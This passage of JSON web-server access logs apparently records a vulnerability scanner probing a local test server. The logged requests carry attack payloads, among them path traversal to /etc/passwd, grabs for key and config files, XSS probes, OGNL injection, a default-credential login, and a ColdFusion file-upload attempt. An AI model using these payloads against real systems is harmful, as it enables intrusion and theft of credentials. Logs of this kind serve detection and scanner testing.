AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminer/adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zdm/login_xdm_uc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTvBcoRqGUS5QdBOh64LnfXx.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A297MTvBcoRqGUS5QdBOh64LnfXx.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.197","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/rest/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-backup.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.167","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.170","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml 